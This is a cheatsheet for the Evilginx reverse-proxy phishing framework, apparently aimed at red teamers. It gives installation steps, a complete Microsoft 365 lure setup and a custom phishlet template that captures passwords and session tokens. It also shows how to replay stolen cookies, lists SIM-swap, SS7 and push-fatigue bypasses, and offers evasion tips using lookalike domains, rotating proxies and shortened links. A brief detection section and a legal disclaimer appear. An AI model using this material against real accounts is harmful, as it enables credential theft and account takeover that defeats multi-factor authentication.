Evilginx & MFA Bypass Cheatsheet

Quick Reference

Advanced phishing framework for bypassing 2FA/MFA through reverse proxy session hijacking.

Legal Warning

Evilginx is a powerful tool for authorized red team engagements ONLY. Unauthorized use is illegal. Always have explicit written permission before testing. This content is for educational purposes.

📦 Installation

Clone & Build (Go required)

git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make

Run with phishlets directory

sudo ./bin/evilginx -p ./phishlets

Docker Installation

docker pull kgretzky/evilginx2
docker run -it -p 443:443 -p 80:80 kgretzky/evilginx2

⚙️ Initial Setup

Set domain & IP

config domain yourdomain.com
config ip YOUR_SERVER_IP

Enable redirect URL (for failed attempts)

config redirect_url https://www.google.com

DNS Requirements

# A Record: yourdomain.com -> SERVER_IP
# A Record: *.yourdomain.com -> SERVER_IP
# Disable Cloudflare proxy (grey cloud)

🎣 Phishlet Commands

List phishlets	`phishlets`
Show phishlet details	`phishlets get-hosts NAME`
Set hostname	`phishlets hostname NAME sub.domain.com`
Enable phishlet	`phishlets enable NAME`
Disable phishlet	`phishlets disable NAME`
Hide phishlet	`phishlets hide NAME`
Unhide phishlet	`phishlets unhide NAME`

🔗 Lure Commands

Create lure	`lures create NAME`
List lures	`lures`
Get lure URL	`lures get-url ID`
Set redirect	`lures edit ID redirect_url URL`
Set custom path	`lures edit ID path /custom`
Delete lure	`lures delete ID`

🍪 Session Commands

List sessions	`sessions`
View session	`sessions ID`
Delete session	`sessions delete ID`
Delete all	`sessions delete all`

📋 Popular Phishlets

Microsoft 365	`o365`
Outlook	`outlook`
Google	`google`
LinkedIn	`linkedin`
GitHub	`github`
Okta	`okta`

🚀 Full O365 Setup Example

# Initial configuration
config domain evil-corp.com
config ip 192.168.1.100

# Setup O365 phishlet
phishlets hostname o365 login.evil-corp.com
phishlets enable o365

# Create lure
lures create o365
lures get-url 0

# Output: https://login.evil-corp.com/XXXX

# Monitor for captured sessions
sessions

🍪 Importing Captured Cookies

1. Get session cookies from Evilginx

sessions 0
# Copy the JSON cookie output

2. Import to browser using Cookie Editor extension

# Install "Cookie-Editor" browser extension
# Navigate to target site
# Click extension -> Import -> Paste JSON
# Refresh page - you're now authenticated!

3. Alternative: Use curl with cookies

curl -b "cookie1=value1; cookie2=value2" https://target.com/api/user

🔓 MFA Bypass Methods

Real-time Phishing (Evilginx)

Proxy intercepts session after MFA completion

SIM Swapping

Port victim's number to attacker's SIM

SS7 Attacks

Intercept SMS at telecom level

Push Notification Fatigue

Spam push requests until user approves

OAuth Consent Phishing

Trick user into granting app permissions

🛡️ Evasion Tips

Domain Selection

Use typosquatting or lookalike domains

micros0ft-login.com, login-0365.com

SSL Certificates

Let's Encrypt auto-generated by Evilginx

IP Blacklisting

Use residential proxies, rotate IPs

URL Shorteners

Obfuscate lure URLs with bit.ly, rebrand.ly

📝 Custom Phishlet Template

name: 'custom_app'
author: '@yourhandle'
min_ver: '2.3.0'

proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'target.com'
    session: true
    is_landing: true

sub_filters:
  - triggers_on: 'login.target.com'
    orig_sub: 'login'
    domain: 'target.com'
    search: 'login.target.com'
    replace: 'login.{phish_domain}'
    mimes: ['text/html', 'application/json']

auth_tokens:
  - domain: '.target.com'
    keys: ['session_token', 'auth_cookie']

credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'login.target.com'
  path: '/authenticate'

🔧 Alternative Tools

Modlishka

Lightweight reverse proxy phishing

Muraena

Automated reverse proxy framework

GoPhish

Phishing campaign management (no MFA bypass)

King Phisher

Campaign toolkit with templates

🔍 Detection (Blue Team)

Certificate Transparency

Monitor CT logs for lookalike domains

Impossible Travel

Token Replay Detection

Same token from different IPs

FIDO2/WebAuthn

Phishing-resistant MFA (hardware keys)

⚡ Quick Command Reference

Configuration

config                    # Show config
config domain DOMAIN      # Set domain
config ip IP              # Set server IP
config redirect_url URL   # Set redirect

Phishlets

phishlets                 # List all
phishlets hostname N H    # Set hostname
phishlets enable N        # Enable
phishlets disable N       # Disable

Lures

lures                     # List all
lures create PHISHLET     # Create new
lures get-url ID          # Get URL
lures delete ID           # Delete

Sessions

sessions                  # List all
sessions ID               # View details
sessions delete ID        # Delete one
sessions delete all       # Delete all

Evilginx & MFA Bypass Quick Reference